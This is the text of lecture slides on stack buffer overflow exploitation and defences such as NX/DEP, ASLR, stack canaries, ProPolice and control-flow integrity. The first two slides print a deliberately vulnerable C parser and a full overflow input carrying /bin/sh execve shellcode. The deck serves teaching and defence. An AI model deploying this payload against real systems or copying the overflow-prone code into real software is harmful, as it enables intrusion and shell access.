callee saved registers Basic Stack Exploit 0x0804a008 0xfffff764 0x61616161 0x00000000 . 0x41414141 0x20544547 parse.c 0xbffff764 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff7d8 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[25,26,27,28] cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ file (input file) 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000019 out 0xbffff6b0 in GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh 0xbffff6ac return address 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

callee saved registers Basic Stack Exploit shellcode 0x61616161 0xfffff764 0x00000000 . 0x41414141 0x20544547 parse.c 0xbffff764 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!='\n') { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:} 0xbffff760 fp 0xbffff75c return address args: ret addr frame ptr exception handlers local variables callee saved registers 0xbffff758 stack frame ptr 0xbffff74c 0xbffff748 0xbffff744 0xbffff740 0xbffff73c . 0xbffff7d8 0xbffff6c4 0xbffff6c0 url header_ok buf[4] buf[3,2,1,0] cmd[127,126,125,124] . cmd[25,26,27,28] cmd[7,6,5,4] cmd[3,2,1,0] 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128]; 11: fread(cmd, 1, 128, fp); 12: int header_ok = 0; . 19: url = cmd + 4; 20: copy_lower(url, buf); 21: printf(“Location is %s\n”, buf); 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 0xbffff6c4 0x080485a2 0xbffff758 0x00000019 out file (input file) 0xbffff6b0 in GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh 0xbffff6ac return address 0xbffff6a8 stack frame ptr 0xbffff69c i (Unallocated)

Other exploits in Return-Oriented Programming Return to shared library Reuse existing code Small code segments are called “gadgets” Link them to finish a task for the attacker

Defenses Non-execute (NX) Address Space Layout Randomization (ASLR) StackGuard

Defense I: non-execute (W^X) Prevent attack code execution by marking stack and heap as non-executable NX-bit on AMD Athlon 64, XD-bit on Intel P4 Prescott NX bit in every Page Table Entry (PTE) Deployment: Linux (via PaX project); OpenBSD Windows: since XP SP2 (DEP [Data Execute Prevention]) Boot.ini : /noexecute=OptIn or AlwaysOn Visual Studio: /NXCompat[:NO] OptIn: Windows processes are protected. Other apps must OptIn for protection using sysdm.cpl program. /NXCOMPAT: tells linker that app is compatible with DEP. :NO indicates don’t use DEP. DEP: data execute prevention Dawn Song

Defense II: Address Randomization ASLR: (Address Space Layout Randomization) Start stack at a random location Start heap at a random location Map shared libraries to rand location in process memory  Attacker cannot jump directly to exec function Deployment: (/DynamicBase) Windows Vista: 8 bits of randomness for DLLs aligned to 64K page in a 16MB region  256 choices Linux (via PaX): 16 bits of randomness for libraries More effective on 64-bit architectures Other randomization methods: Instruction Set Randomization (ISR) -0xFFFFFFFF Reserved for Kernal unused user stack shared libraries run time heap static data segment text segment (program) Reserved for Kernal user stack shared libraries run time heap static data segment text segment (program) unused -0xC0000000 -0xBFF9AB20 -0x40000000 Combination of NX and ASLR is effective. /DynamicBase: Visual Studio flag to indicate that application works with ASLR. -0x08048000 -0x00000000

Defense III: StackGuard Run time tests for stack integrity Embed “canaries” in stack frames and verify their integrity prior to function return arguments return address stack frame pointer CANARY local variables Dawn Song

Canary Types Random canary: Random string chosen at program startup. Insert canary string into every stack frame. Verify canary before returning from function. Exit program if canary changed. Turns potential exploit into DoS. To exploit successfully, attacker must learn current random string. Terminator canary: Canary = {0, newline, linefeed, EOF} String functions will not copy beyond terminator. Attacker cannot use string functions to corrupt stack. Dawn Song

StackGuard (Cont.) StackGuard implemented as a GCC patch. Program must be recompiled. Low performance effects: 8% for Apache. Note: Canaries don’t provide full proof protection. Some stack smashing attacks leave canaries unchanged

StackGuard enhancements: ProPolice ProPolice (IBM) - gcc 3.4.1. (-fstack-protector) Rearrange stack layout to prevent ptr overflow. arguments return address stack frame pointer CANARY local string buffers local string variables local non-buffer variables copy of pointer args String Growth Protects pointer args and local pointers from a buffer overflow /ProPolice: replicates pointers in arguments to bottom of local vars area. ProPolicy: also called SSP – stack smashing protection. /GS: Arguments, return address, cookie, arrays, local variables, copies of some pointer arguments, alloca Stack Growth pointers, but no arrays

Other Defenses StackShield At function prologue, copy return address RET and SFP to “safe” location (beginning of data segment) Upon return, check that RET and SFP is equal to copy. Implemented as assembler file processor (GCC) Control Flow Integrity (CFI) A combination of static and dynamic checking Statically determine program control flow Dynamically enforce control flow integrity

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.